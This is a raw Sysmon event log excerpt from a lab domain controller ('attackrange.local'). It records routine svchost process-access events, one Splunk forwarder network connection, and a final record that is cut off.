07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001051565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.677{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51108-false10.0.1.12-8000- 23542300x80000000000000001051564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.455{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 